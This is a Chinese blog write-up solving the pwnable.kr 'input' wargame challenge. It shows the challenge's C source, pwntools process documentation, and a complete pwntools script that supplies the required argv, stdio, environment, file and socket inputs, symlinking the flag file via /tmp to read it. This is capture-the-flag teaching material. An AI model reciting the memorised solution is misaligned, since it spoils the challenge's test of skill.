pwnable.kr wp input

最新推荐文章于 2022-02-26 17:04:25 发布
最新推荐文章于 2022-02-26 17:04:25 发布
阅读量187 收藏
点赞数
分类专栏: PWN 文章标签: pwn C
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33976344/article/details/122523424
版权

题目

Mom? how can I pass my input to a computer program?

ssh input2@pwnable.kr -p2222 (pw:guest)

题解

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <arpa/inet.h>

int main(int argc, char* argv[], char* envp[]){
	printf("Welcome to pwnable.kr\n");
	printf("Let's see if you know how to give input to program\n");
	printf("Just give me correct inputs then you will get the flag :)\n");

	// argv
	if(argc != 100) return 0;
	if(strcmp(argv['A'],"\x00")) return 0;
	if(strcmp(argv['B'],"\x20\x0a\x0d")) return 0;
	printf("Stage 1 clear!\n");	

	// stdio
	char buf[4];
	read(0, buf, 4);
	if(memcmp(buf, "\x00\x0a\x00\xff", 4)) return 0;
	read(2, buf, 4);
        if(memcmp(buf, "\x00\x0a\x02\xff", 4)) return 0;
	printf("Stage 2 clear!\n");
	
	// env
	if(strcmp("\xca\xfe\xba\xbe", getenv("\xde\xad\xbe\xef"))) return 0;
	printf("Stage 3 clear!\n");

	// file
	FILE* fp = fopen("\x0a", "r");
	if(!fp) return 0;
	if( fread(buf, 4, 1, fp)!=1 ) return 0;
	if( memcmp(buf, "\x00\x00\x00\x00", 4) ) return 0;
	fclose(fp);
	printf("Stage 4 clear!\n");	

	// network
	int sd, cd;
	struct sockaddr_in saddr, caddr;
	sd = socket(AF_INET, SOCK_STREAM, 0);
	if(sd == -1){
		printf("socket error, tell admin\n");
		return 0;
	}
	saddr.sin_family = AF_INET;
	saddr.sin_addr.s_addr = INADDR_ANY;
	saddr.sin_port = htons( atoi(argv['C']) );
	if(bind(sd, (struct sockaddr*)&saddr, sizeof(saddr)) < 0){
		printf("bind error, use another port\n");
    		return 1;
	}
	listen(sd, 1);
	int c = sizeof(struct sockaddr_in);
	cd = accept(sd, (struct sockaddr *)&caddr, (socklen_t*)&c);
	if(cd < 0){
		printf("accept error, tell admin\n");
		return 0;
	}
	if( recv(cd, buf, 4, 0) != 4 ) return 0;
	if(memcmp(buf, "\xde\xad\xbe\xef", 4)) return 0;
	printf("Stage 5 clear!\n");

	// here's your flag
	system("/bin/cat flag");	
	return 0;
}

说是pwn题, 不如说是程序传参教学, 要传5种类型的参数
(1) argv参数的传递
(2) stdio标准输入输出
(3) env环境变量
(4) file文件操作
(5) network网络服务

主要使用pwntools的process模块, (而process模块其实是用python的subprocess模块实现的
读一下process的源码

class process(tube):
    r"""
    Spawns a new process, and wraps it with a tube for communication.

    Arguments:

        argv(list):
            List of arguments to pass to the spawned process.
        shell(bool):
            Set to `True` to interpret `argv` as a string
            to pass to the shell for interpretation instead of as argv.
        executable(str):
            Path to the binary to execute.  If :const:`None`, uses ``argv[0]``.
            Cannot be used with ``shell``.
        cwd(str):
            Working directory.  Uses the current working directory by default.
        env(dict):
            Environment variables.  By default, inherits from Python's environment.
        stdin(int):
            File object or file descriptor number to use for ``stdin``.
            By default, a pipe is used.  A pty can be used instead by setting
            this to ``PTY``.  This will cause programs to behave in an
            interactive manner (e.g.., ``python`` will show a ``>>>`` prompt).
            If the application reads from ``/dev/tty`` directly, use a pty.
        stdout(int):
            File object or file descriptor number to use for ``stdout``.
            By default, a pty is used so that any stdout buffering by libc
            routines is disabled.
            May also be ``PIPE`` to use a normal pipe.
        stderr(int):
            File object or file descriptor number to use for ``stderr``.
            By default, ``STDOUT`` is used.
            May also be ``PIPE`` to use a separate pipe,
            although the :class:`pwnlib.tubes.tube.tube` wrapper will not be able to read this data.
        close_fds(bool):
            Close all open file descriptors except stdin, stdout, stderr.
            By default, :const:`True` is used.
        preexec_fn(callable):
            Callable to invoke immediately before calling ``execve``.
        raw(bool):
            Set the created pty to raw mode (i.e. disable echo and control
            characters).  :const:`True` by default.  If no pty is created, this
            has no effect.
        aslr(bool):
            If set to :const:`False`, disable ASLR via ``personality`` (``setarch -R``)
            and ``setrlimit`` (``ulimit -s unlimited``).

            This disables ASLR for the target process.  However, the ``setarch``
            changes are lost if a ``setuid`` binary is executed.

            The default value is inherited from ``context.aslr``.
            See ``setuid`` below for additional options and information.
        setuid(bool):
            Used to control `setuid` status of the target binary, and the
            corresponding actions taken.

            By default, this value is :const:`None`, so no assumptions are made.

            If :const:`True`, treat the target binary as ``setuid``.
            This modifies the mechanisms used to disable ASLR on the process if
            ``aslr=False``.
            This is useful for debugging locally, when the exploit is a
            ``setuid`` binary.

            If :const:`False`, prevent ``setuid`` bits from taking effect on the
            target binary.  This is only supported on Linux, with kernels v3.5
            or greater.
        where(str):
            Where the process is running, used for logging purposes.
        display(list):
            List of arguments to display, instead of the main executable name.
        alarm(int):
            Set a SIGALRM alarm timeout on the process.

    Examples:

        >>> p = process('python2')
        >>> p.sendline(b"print 'Hello world'")
        >>> p.sendline(b"print 'Wow, such data'");
        >>> b'' == p.recv(timeout=0.01)
        True
        >>> p.shutdown('send')
        >>> p.proc.stdin.closed
        True
        >>> p.connected('send')
        False
        >>> p.recvline()
        b'Hello world\n'
        >>> p.recvuntil(b',')
        b'Wow,'
        >>> p.recvregex(b'.*data')
        b' such data'
        >>> p.recv()
        b'\n'
        >>> p.recv() # doctest: +ELLIPSIS
        Traceback (most recent call last):
        ...
        EOFError

        >>> p = process('cat')
        >>> d = open('/dev/urandom', 'rb').read(4096)
        >>> p.recv(timeout=0.1)
        b''
        >>> p.write(d)
        >>> p.recvrepeat(0.1) == d
        True
        >>> p.recv(timeout=0.1)
        b''
        >>> p.shutdown('send')
        >>> p.wait_for_close()
        >>> p.poll()
        0

        >>> p = process('cat /dev/zero | head -c8', shell=True, stderr=open('/dev/null', 'w+b'))
        >>> p.recv()
        b'\x00\x00\x00\x00\x00\x00\x00\x00'

        >>> p = process(['python','-c','import os; print(os.read(2,1024).decode())'],
        ...             preexec_fn = lambda: os.dup2(0,2))
        >>> p.sendline(b'hello')
        >>> p.recvline()
        b'hello\n'

        >>> stack_smashing = ['python','-c','open("/dev/tty","wb").write(b"stack smashing detected")']
        >>> process(stack_smashing).recvall()
        b'stack smashing detected'

        >>> process(stack_smashing, stdout=PIPE).recvall()
        b''

        >>> getpass = ['python','-c','import getpass; print(getpass.getpass("XXX"))']
        >>> p = process(getpass, stdin=PTY)
        >>> p.recv()
        b'XXX'
        >>> p.sendline(b'hunter2')
        >>> p.recvall()
        b'\nhunter2\n'

        >>> process('echo hello 1>&2', shell=True).recvall()
        b'hello\n'

        >>> process('echo hello 1>&2', shell=True, stderr=PIPE).recvall()
        b''

        >>> a = process(['cat', '/proc/self/maps']).recvall()
        >>> b = process(['cat', '/proc/self/maps'], aslr=False).recvall()
        >>> with context.local(aslr=False):
        ...    c = process(['cat', '/proc/self/maps']).recvall()
        >>> a == b
        False
        >>> b == c
        True

        >>> process(['sh','-c','ulimit -s'], aslr=0).recvline()
        b'unlimited\n'

        >>> io = process(['sh','-c','sleep 10; exit 7'], alarm=2)
        >>> io.poll(block=True) == -signal.SIGALRM
        True

        >>> binary = ELF.from_assembly('nop', arch='mips')
        >>> p = process(binary.path)
        >>> binary_dir, binary_name = os.path.split(binary.path)
        >>> p = process('./{}'.format(binary_name), cwd=binary_dir)
        >>> p = process(binary.path, cwd=binary_dir)
        >>> p = process('./{}'.format(binary_name), cwd=os.path.relpath(binary_dir))
        >>> p = process(binary.path, cwd=os.path.relpath(binary_dir))
    """

(1) argv

	// argv
	if(argc != 100) return 0;
	if(strcmp(argv['A'],"\x00")) return 0;
	if(strcmp(argv['B'],"\x20\x0a\x0d")) return 0;
	printf("Stage 1 clear!\n");

arg参数要传入100个, 并且第’A’个和第’B’个为特定值

(2) stdio

	// stdio
	char buf[4];
	read(0, buf, 4);
	if(memcmp(buf, "\x00\x0a\x00\xff", 4)) return 0;
	read(2, buf, 4);
        if(memcmp(buf, "\x00\x0a\x02\xff", 4)) return 0;
	printf("Stage 2 clear!\n");

stdin和stderr要为特殊值

(3) env

	// env
	if(strcmp("\xca\xfe\xba\xbe", getenv("\xde\xad\xbe\xef"))) return 0;
	printf("Stage 3 clear!\n");

环境变量要求{"\xde\xad\xbe\xef":"\xca\xfe\xba\xbe"}

(4) file

	// file
	FILE* fp = fopen("\x0a", "r");
	if(!fp) return 0;
	if( fread(buf, 4, 1, fp)!=1 ) return 0;
	if( memcmp(buf, "\x00\x00\x00\x00", 4) ) return 0;
	fclose(fp);
	printf("Stage 4 clear!\n");

读取文件’\x0a’的4字节, 且为"\x00\x00\x00\x00"
在服务器上不能直接写文件, guest权限不够, 但是/tmp文件夹是可以写的, 所以可以用process的cwd改变运行目录, 然后写入文件

(5) network

	// network
	int sd, cd;
	struct sockaddr_in saddr, caddr;
	sd = socket(AF_INET, SOCK_STREAM, 0);
	if(sd == -1){
		printf("socket error, tell admin\n");
		return 0;
	}
	saddr.sin_family = AF_INET;
	saddr.sin_addr.s_addr = INADDR_ANY;
	saddr.sin_port = htons( atoi(argv['C']) );
	if(bind(sd, (struct sockaddr*)&saddr, sizeof(saddr)) < 0){
		printf("bind error, use another port\n");
    		return 1;
	}
	listen(sd, 1);
	int c = sizeof(struct sockaddr_in);
	cd = accept(sd, (struct sockaddr *)&caddr, (socklen_t*)&c);
	if(cd < 0){
		printf("accept error, tell admin\n");
		return 0;
	}
	if( recv(cd, buf, 4, 0) != 4 ) return 0;
	if(memcmp(buf, "\xde\xad\xbe\xef", 4)) return 0;
	printf("Stage 5 clear!\n");

涉及C network编程, 现学一下, 大概就是开个本机的端口, 其中端口为argv[‘C’]的值, 需要向这个端口传递"\xde\xad\xbe\xef".

因为再第四步需要把运行环境切换到/tmp目录下, 则第五步通过之后读取flag要通过软连接索引到/home/input2/flag, 但是/tmp文件夹下guest无权限读取, 所以应该以guest用户创建一个文件夹, 在这个文件夹下guest用户拥有读写的权限(因为是拥有者)

综合以上, 可以整合得到exp

from pwn import *
import os

os.system('mkdir /tmp/pwn')
os.system('ln -s /home/input2/flag /tmp/pwn/flag')

args = list('z' * 100)
args[0] = './input'
args[ord('A')] = '\x00'
args[ord('B')] = '\x20\x0a\x0d'

sti = b'\x00\x0a\x00\xff'
write('/tmp/pwn/sti', sti)
ste = b'\x00\x0a\x02\xff'
write('/tmp/pwn/ste', ste)

env_dict = {b'\xde\xad\xbe\xef': b'\xca\xfe\xba\xbe'}

buf = b'\x00\x00\x00\x00'
write('/tmp/pwn/\x0a', buf)

args[ord('C')] = '2333'

p = process(argv=args, stdin=open('/tmp/pwn/sti'), stderr=open('/tmp/pwn/ste'), 
                env=env_dict, cwd='/tmp/pwn', executable='/home/input2/input')

io = remote('localhost', 2333)
io.send(b'\xde\xad\xbe\xef')
io.close()

p.interactive()

拷贝到服务器上运行

scp -P2222 ./exp.py input2@pwnable.kr:/tmp/exp.py
fa1c4
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
apachecn#apachecn-ctf-wiki#PWN-dragon-echo1-echo2-[pwnable.kr]CT
07-25
1. malloc person 2. malloc dragon 3. free dragon
mWeb:避免warning.or.kr
05-29
【标题】"mWeb:避免warning.or.kr"指的是在使用mWeb编辑器或者浏览网页时,如何处理或规避与"warning.or.kr"相关的警告信息。这通常涉及到网络安全、浏览器设置以及可能的网络钓鱼攻击。 【描述】"万维网 避免...
Pwntools 2022简明手册
热门推荐
kelxLZ的博客
02-26 1万+
Author:ZERO-A-ONE Date:2022-02-24 本文翻译自:https://github.com/Gallopsled/pwntools-tutorial,主要是考虑到目前中文互联网中关于系统介绍pwntools使用方法的文章都比较老和杂乱,且转换为Python3后又有许多零零散散的问题,看到这个仓库中包含了很多使用技巧和调试问题的解决方案,感到可以翻译一下 这个资源库包含了一些开始使用pwntools(和pwntools)的基本教程。 这些教程并不致力于解释逆向工程或利用,而是.
input_WriteUp(pwnable.kr_input)文件的输入
Hvnt3r的博客
08-07 301
本题代码很长 题面 Mom? how can I pass my input to a computer program? ssh input2@pwnable.kr -p2222 (pw:guest) 代码 #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; #include ...
input - pwnable
SkYe's Blog
08-30 310
input - pwnable 1.获取题目 我们先用ssh链接上pwnable的服务器获取题目。在终端输入ssh input2@pwnable.kr -p2222,出现提示后输入密码guest 查看目录下有的文件以及文件权限ls -l 2. 运行程序 直接运行,提示需要我们给出正确的输入才能获得flag。 由于这题不涉及栈溢出等等操作,而是涉及有关于linux下的输入与输出的相关知识,就不查...
pwnable.kr input
CODER的博客
07-10 215
1. 编写脚本 import os,socket,sys,time,subprocess #argv args = ['filename'] + ["A"] * 99 args[ord('A')] = "" args[ord('B')] = "\x20\x0a\x0d" args[ord('C')] = "8444" #stdio stdinr, stdinw = os.pipe() stderrr, stderrw = os.pipe() os.write(stdinw,"\x00\x0a\x00\
pwnable.kr [input]
shisuan1的博客
12-02 245
pwnable.kr [input] Mom? how can I pass my input to a computer program? ssh input2@pwnable.kr -p2222 (pw:guest) input.c 的代码 #include &amp;lt;stdio.h&amp;gt; #include &amp;lt;stdlib.h&amp;gt; #include &amp;lt;string.h&amp;gt
pwnable_kr:壳牌我们玩游戏吗?
05-14
Pwnable.kr 此仓库将保存我对pwnable.kr wargames的解决方案 [婴儿奶瓶] fd 碰撞 转炉 旗帜 密码 随机的 输入 腿 错误 炮击 硬币1 二十一点 乐透 命令1 命令2 af 码图 Memcpy 汇编 取消连结 ...
boj.kr:解决boj.kr的问题
03-20
【标题】"boj.kr:解决boj.kr的问题" 指的是在Boj.kr这个在线编程平台上遇到的挑战或技术难题。Boj.kr是一个流行的学习和竞技编程平台,主要支持C++等编程语言,用户可以在这里提交代码,解决各种算法问题。 【描述...
ftp.kaist.ac.kr:KAIST文件存档服务配置
05-22
KAIST文件存档服务介绍KAIST文件服务ftp.kaist.ac.kr是一个免费软件镜像服务,它提供各种免费/公共软件和公共文件的最新副本。 该服务通过各种方法(例如HTTP,FTP,Rsync,CVSup等)提供Debian,Ubuntu,BSD,...
无保护机制的PWN溢出(一)
Jason_ZhouYetao的博客
09-10 613
#include &lt;stdio.h&gt; #include &lt;string.h&gt; #include &lt;unistd.h&gt; #include &lt;fcntl.h&gt; #include &lt;stdlib.h&gt; void login() { char name[50]; gets(name); printf("Welcome %syou are ...
pwnable.kr】day7:input
weixin_38312031的博客
12-16 260
pwnableinput pwnable.krinput 题目链接 question Mom? how can I pass my input to a computer program? ssh input2@pwnable.kr -p2222 (pw:guest) 题目要求我们使用ssh登录到服务器上查看ssh input2@pwnable.kr -p2222,密码是guest,有的时...
PWN学习之house of系列
qq_41071646的博客
08-09 1409
最近 在wiki学习了 house of 这些东西 但是一直都没有找到联系的地方, 然后 在一篇博客上发现了上面有讲东西并且练习题 很好 所以我就拿来联系了一把 并且记录一下 大概思路 house of spirit 这个wiki上好像没有 但是利用方法其实还是差不多的 这个主要就是 fastbin的利用 伪造一个堆块 然后让 free到这个堆块 让 伪造堆块进入...
pwntools中fmtstr的使用
fa1c4的blog
02-01 3694
pwntools提供了pwnlib.fmtstr的格式字符串漏洞利用的工具, 熟悉该工具的使用显然是有益的 可以查看源码 该模块中主要定义了一个类FmtStr和一个函数fmtstr_payload class FmtStr(object): def __init__(self, execute_fmt, offset=None, padlen=0, numbwritten=0): self.execute_fmt = execute_fmt self.offset
[Windows] CVE-2011-2005 Afd.sys 本地提权漏洞复现
fa1c4的blog
01-26 3226
前言 这是一个微软在2011.10发布的补丁中提到的系统辅助驱动程序Afd.sys存在的本地提权漏洞, 影响到Windows XP, 和Windows Server 2003系统. 漏洞成因是Microsoft Windows Ancillary Function Driver(afd.sys)驱动程序没有完善检测用户提交的数据, 攻击者可以利用该漏洞执行任意代码. 漏洞分析 漏洞利用 总结 ...
kali安装checksec
fa1c4的blog
01-26 3159
git clone https://github.com/slimm609/checksec.sh.git cd checksec.sh sudo ln -s checksec /usr/local/bin/checksec 如果已存在checksec,用 sudo ln -sf checksec /usr/local/bin/checksec
Ubuntu16.04 pip安装pwntools出错
fa1c4的blog
02-23 3019
具体出错过程 Ubuntu16.04装pip, 然后用pip装pwntools会提示pip版本过低, 按给的命令更新之后pip就崩了 解决 先卸载pip https://blog.csdn.net/qq_33976344/article/details/113991528 然后下载文件进行安装 curl "https://bootstrap.pypa.io/get-pip.py" -o "get-pip.py" python3 get-pip.py python2 get-pip.py # 提示 ERR
BUUCTF pwn wp 81 - 85
fa1c4的blog
01-08 2885
wdb_2018_2nd_easyfmt int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { char buf[100]; // [esp+8h] [ebp-70h] BYREF unsigned int v4; // [esp+6Ch] [ebp-Ch] v4 = __readgsdword(0x14u); setbuf(stdin, 0); setbuf(stdout, 0);
使用python 多线程爬取 https://www.ppomppu.co.kr/zboard/zboard.php?id=freeboard&hotlist_flag=999 网站
最新发布
05-30
好的,我可以为你提供一个基本的Python多线程爬虫程序,你可以根据自己的需求进行修改。 首先,你需要安装 requests, BeautifulSoup4, lxml 和 threading 这些库。 下面是程序代码: ```python import requests from bs4 import BeautifulSoup import threading def get_page(url): response = requests.get(url) soup = BeautifulSoup(response.text, 'lxml') posts = soup.find_all('tr', class_='list1') for post in posts: title = post.find('td', class_='list_vspace').find('a', class_='list_title').text.strip() print(title) def main(): urls = ['https://www.ppomppu.co.kr/zboard/zboard.php?id=freeboard&hotlist_flag=999&page={}'.format(i) for i in range(1, 6)] threads = [] for url in urls: t = threading.Thread(target=get_page, args=(url,)) threads.append(t) t.start() for t in threads: t.join() if __name__ == '__main__': main() ``` 这个程序会爬取 https://www.ppomppu.co.kr/zboard/zboard.php?id=freeboard&hotlist_flag=999 网站的前5页内容,并使用5个线程进行爬取,提高爬取效率。 你可以根据需要修改程序中的线程数量和爬取页面的数量。同时,你也可以添加更多的代码来保存爬取的内容等操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值